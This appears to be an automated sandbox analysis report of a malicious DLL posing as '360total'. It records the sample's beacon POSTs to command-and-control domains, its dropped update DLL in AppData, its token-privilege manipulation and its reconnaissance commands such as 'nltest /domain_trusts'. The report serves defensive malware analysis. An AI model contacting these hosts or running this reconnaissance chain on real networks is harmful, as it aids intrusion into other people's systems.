Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: grizmotras.comContent-Length: 180Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_00000203431C4F58 InternetReadFile,

4_2_00000203431C4F58

Source: global traffic	DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic	DNS traffic detected: DNS query: grizmotras.com

Source: unknown

HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache

Source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr	String found in binary or memory: ftp://ftp%2desktop.ini
Source: rundll32.exe	String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr	String found in binary or memory: http://dr.f.360.cn/scanlist
Source: rundll32.exe	String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe	String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr	String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe	String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/g
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3256142995.00000223820D0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/)
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/U
Source: rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/p
Source: rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/7
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/7-
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF2E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFE88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/&
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFE88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/4K&
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/dOIDInfo
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/n
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/rs
Source: rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3256142995.00000223820D0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/live/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726

Source: unknown	HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49730 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: 360total.dll.dll	Static PE information: section name: yhDm^
Source: Update_79066994.dll.4.dr	Static PE information: section name: yhDm^

Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C78C0 NtReadFile,	4_2_00000203431C78C0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431CB0C4 NtOpenKey,RtlpNtOpenKey,	4_2_00000203431CB0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C7B40 NtFreeVirtualMemory,	4_2_00000203431C7B40
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431CAD34 NtAllocateVirtualMemory,	4_2_00000203431CAD34
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C378C NtClose,	4_2_00000203431C378C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C7588 RtlInitUnicodeString,NtCreateFile,NtClose,	4_2_00000203431C7588
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C77B0 RtlInitUnicodeString,NtCreateFile,	4_2_00000203431C77B0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431CB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	4_2_00000203431CB1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C79C8 NtClose,	4_2_00000203431C79C8
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	4_2_00000203431C463C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C7A54 NtWriteFile,	4_2_00000203431C7A54
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431D0AC0 NtFreeVirtualMemory,	4_2_00000203431D0AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C7ACC NtClose,	4_2_00000203431C7ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431D0AF0 NtWriteFile,	4_2_00000203431D0AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C7704 NtQueryInformationFile,	4_2_00000203431C7704
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431CCB54 NtDelayExecution,	4_2_00000203431CCB54
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C745C RtlInitUnicodeString,NtOpenFile,NtClose,	4_2_00000203431C745C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431D0A78 NtClose,	4_2_00000203431D0A78
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C7694 RtlInitUnicodeString,NtDeleteFile,	4_2_00000203431C7694
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431D0A90 NtDeleteFile,	4_2_00000203431D0A90
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000002238013B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	9_2_000002238013B1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000002238013463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	9_2_000002238013463C
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380137A54 NtWriteFile,	9_2_0000022380137A54
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000002238013B0C4 NtOpenKey,RtlpNtOpenKey,	9_2_000002238013B0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000002238013AD34 NtAllocateVirtualMemory,	9_2_000002238013AD34
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380137B40 NtFreeVirtualMemory,	9_2_0000022380137B40
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000002238013CB54 NtDelayExecution,	9_2_000002238013CB54
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000002238013378C NtClose,	9_2_000002238013378C
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000223801377B0 RtlInitUnicodeString,NtCreateFile,	9_2_00000223801377B0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000223801379C8 NtClose,	9_2_00000223801379C8
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000002238013745C RtlInitUnicodeString,NtOpenFile,NtClose,	9_2_000002238013745C
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380140A78 NtClose,	9_2_0000022380140A78
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380137694 RtlInitUnicodeString,NtDeleteFile,	9_2_0000022380137694
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380140A90 NtDeleteFile,	9_2_0000022380140A90
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380140AC0 NtFreeVirtualMemory,	9_2_0000022380140AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000223801378C0 NtReadFile,	9_2_00000223801378C0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380137ACC NtClose,	9_2_0000022380137ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380137704 NtQueryInformationFile,	9_2_0000022380137704
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380137588 RtlInitUnicodeString,NtCreateFile,NtClose,	9_2_0000022380137588

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018006A2C8: DeviceIoControl,

3_2_000000018006A2C8

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,

3_2_000000018004B1A4

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180017FE8	3_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018006DFF4	3_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800220D8	3_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018007C140	3_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180060174	3_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018008023C	3_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018000834C	3_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018006C470	3_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800784E0	3_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800764F0	3_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180060578	3_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180010580	3_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004E5DC	3_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180062600	3_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180002610	3_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180004638	3_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004A650	3_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018006E760	3_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800647B0	3_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018007E7C7	3_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180076930	3_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180062954	3_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018006A994	3_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018006E9FC	3_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180082A18	3_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180072A27	3_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180010B58	3_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180026C84	3_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001ECF4	3_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180008E20	3_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180052FD8	3_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018003AFE8	3_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018005D014	3_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018006F0B4	3_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800630CC	3_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018005912C	3_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004B1A4	3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180049278	3_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018007B2D0	3_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002B2EC	3_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018006D3D4	3_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800033E0	3_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180075480	3_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800694A0	3_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018005958C	3_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800576DC	3_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800097E0	3_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800277FC	3_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002D964	3_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180073B60	3_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018007BBB0	3_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001BC38	3_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018005DD18	3_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180073DF0	3_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180011DF0	3_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018005BE6C	3_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004FF88	3_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000203431C1030	4_2_00000203431C1030
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000022380131030	9_2_0000022380131030

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180005348 appears 71 times

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5572 -s 452

Source: classification engine

Classification label: mal100.spre.troj.evad.winDLL@42/11@2/2

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess,	3_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,	3_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	3_2_000000018008395A

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018004B780 CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,ProcessIdToSessionId,Process32NextW,CloseHandle,CloseHandle,

3_2_000000018004B780

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00000001800072A8 CoCreateInstance,

3_2_00000001800072A8

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018003A8D4 LoadLibraryExW,FindResourceW,SizeofResource,LoadResource,LockResource,malloc,memmove,FreeResource,FreeLibrary,VerQueryValueW,free,

3_2_000000018003A8D4

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

3_2_0000000180049AEC

Source: C:\Windows\System32\rundll32.exe

File created: C:\Users\user\AppData\Roaming\Custom_update

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5572
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5892:120:WilError_03

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\eddefae7-6eaa-4249-9c09-cb1fe09591eb

Jump to behavior

Source: 360total.dll.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject

Source: rundll32.exe, rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, Update_79066994.dll.4.dr	Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, Update_79066994.dll.4.dr	Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5572 -s 452
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll", #1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5572 -s 472
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
